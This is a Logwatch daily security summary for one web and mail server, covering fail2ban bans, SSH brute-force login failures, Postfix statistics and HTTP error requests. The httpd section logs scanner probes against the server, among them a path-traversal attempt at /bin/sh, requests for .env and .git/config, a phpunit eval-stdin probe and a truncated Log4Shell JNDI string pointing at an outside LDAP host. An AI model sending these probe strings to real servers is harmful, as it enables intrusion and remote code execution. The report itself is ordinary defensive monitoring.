################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Thu Dec 30 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-29 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 39:38 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
34.147.79.201 -> 161.97.119.209:25562: 1 Time(s)
34.75.87.100 -> 161.97.119.209:25562: 1 Time(s)
35.201.168.66 -> 161.97.119.209:25562: 1 Time(s)
92.118.234.202 -> zapf.wiki:443: 7 Time(s)
A total of 4 sites probed the server
161.35.230.3
162.62.33.200
165.227.221.200
167.71.102.95
Requests with error response codes
400 Bad Request
zapf.wiki:443: 7 Time(s)
161.97.119.209:25562: 3 Time(s)
mstshash=Administr: 3 Time(s)
null: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/: 1 Time(s)
/.env: 1 Time(s)
/.git/config: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
HTTP/1.0: 1 Time(s)
g\xC1\x81i\xB3\xF6\xF2\xCB\xB0\xA9\x19N\xD ... x09\xC0\x13\xC0: 1 Time(s)
499 (undefined)
/: 4 Time(s)
500 Internal Server Error
/: 18 Time(s)
/.env: 5 Time(s)
/.git/config: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/robots.txt: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
///libs/js/iframe.js: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/ReportServer: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/api/productConfig: 1 Time(s)
/console/: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/login: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (119.29.77.63): 38 Time(s)
root (1.15.121.25): 37 Time(s)
root (139.59.44.143): 35 Time(s)
root (177.135.169.91): 31 Time(s)
root (94.200.55.38): 30 Time(s)
root (121.4.154.134): 21 Time(s)
root (106.54.164.19): 20 Time(s)
root (115.248.153.89): 20 Time(s)
root (host-88-215-177-224.stavropol.ru): 20 Time(s)
unknown (177.135.169.91): 19 Time(s)
root (202.21.123.198): 18 Time(s)
unknown (139.59.44.143): 15 Time(s)
root (49.233.203.30): 14 Time(s)
unknown (121.4.154.134): 14 Time(s)
unknown (94.200.55.38): 14 Time(s)
unknown (1.15.121.25): 12 Time(s)
unknown (119.29.77.63): 12 Time(s)
unknown (49.233.203.30): 11 Time(s)
root (net-109-116-41-238.cust.vodafonedsl.it): 9 Time(s)
unknown (202.21.123.198): 9 Time(s)
unknown (host-88-215-177-224.stavropol.ru): 8 Time(s)
root (107.189.31.241): 6 Time(s)
root (111.90.145.190): 6 Time(s)
root (198.98.48.203): 6 Time(s)
root (199.195.252.18): 6 Time(s)
root (5.79.109.48): 6 Time(s)
root (89.163.252.30): 6 Time(s)
root (korematsu.tor-exit.calyxinstitute.org): 6 Time(s)
root (tor-exit-relay-8.anonymizing-proxy.digitalcourage.de): 6 Time(s)
root (80.253.31.232): 5 Time(s)
unknown (106.54.164.19): 5 Time(s)
unknown (115.248.153.89): 5 Time(s)
root (175.42.70.240): 3 Time(s)
unknown (154.114.57.143): 2 Time(s)
unknown (165.22.195.82): 2 Time(s)
unknown (189.172.111.169): 2 Time(s)
unknown (62.175.19.95.dynamic.jazztel.es): 2 Time(s)
unknown (86.33.9.87): 2 Time(s)
unknown (91.86.121.197): 2 Time(s)
root (140.250.176.70): 1 Time(s)
root (165.22.195.82): 1 Time(s)
root (178.128.172.251): 1 Time(s)
root (42.99.180.135): 1 Time(s)
unknown (103.254.198.67): 1 Time(s)
unknown (141.98.10.202): 1 Time(s)
unknown (175.42.70.240): 1 Time(s)
unknown (2.57.121.35): 1 Time(s)
unknown (203.128.242.166): 1 Time(s)
unknown (209.141.47.245): 1 Time(s)
unknown (62.233.50.53): 1 Time(s)
unknown (92.255.85.237): 1 Time(s)
unknown (net-109-116-41-238.cust.vodafonedsl.it): 1 Time(s)
Invalid Users:
Unknown Account: 145 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
324 Miscellaneous warnings
8.185K Bytes accepted 8,381
8.185K Bytes sent via SMTP 8,381
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
493 Connections
327 Connections lost (inbound)
493 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 8 Time(s)
Failed logins from:
1.15.121.25: 37 times
5.79.109.48: 6 times
42.99.180.135 (ip-42-99-180-135.asianetcom.net): 1 time
49.233.203.30: 14 times
80.253.31.232: 5 times
88.215.177.224 (host-88-215-177-224.stavropol.ru): 20 times
89.163.252.30 (srv1016.dedicated.server-hosting.expert): 6 times
94.200.55.38: 30 times
106.54.164.19: 20 times
107.189.31.241 (LuxembourgTor17.lu): 6 times
109.116.41.238 (net-109-116-41-238.cust.vodafonedsl.it): 9 times
111.90.145.190 (web12.olukotun.info): 6 times
115.248.153.89: 20 times
119.29.77.63: 38 times
121.4.154.134: 21 times
139.59.44.143: 35 times
140.250.176.70: 1 time
162.247.74.7 (korematsu.tor-exit.calyxinstitute.org): 6 times
165.22.195.82: 1 time
175.42.70.240: 3 times
177.135.169.91 (west.static.gvt.net.br): 31 times
178.128.172.251: 1 time
185.220.102.254 (tor-exit-relay-8.anonymizing-proxy.digitalcourage.de): 6 times
198.98.48.203 (NewYorkTor7.us): 6 times
199.195.252.18 (NewYorkTor15.us): 6 times
202.21.123.198: 18 times
Illegal users from:
2001:470:1:332::2 (the-shadow-server-foundation.e0-1.core1.sfo2.he.net): 1 time
undef: 102 times
1.15.121.25: 12 times
2.57.121.35 (smtp35.kcmoa.com): 2 times
45.88.137.100: 1 time
49.233.203.30: 11 times
62.233.50.53: 1 time
64.62.197.152: 1 time
86.33.9.87: 2 times
88.215.177.224 (host-88-215-177-224.stavropol.ru): 8 times
91.86.121.197: 2 times
92.255.85.237: 1 time
94.200.55.38: 14 times
95.19.175.62 (62.175.19.95.dynamic.jazztel.es): 2 times
103.254.198.67: 1 time
106.54.164.19: 5 times
109.116.41.238 (net-109-116-41-238.cust.vodafonedsl.it): 1 time
115.248.153.89: 5 times
119.29.77.63: 12 times
121.4.154.134: 14 times
139.59.44.143: 15 times
141.98.10.202: 1 time
154.114.57.143: 2 times
165.22.195.82: 2 times
175.42.70.240: 1 time
177.135.169.91 (west.static.gvt.net.br): 19 times
189.172.111.169 (dsl-189-172-111-169-dyn.prod-infinitum.com.mx): 2 times
202.21.123.198: 9 times
203.128.242.166: 1 time
209.141.47.245: 1 time
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################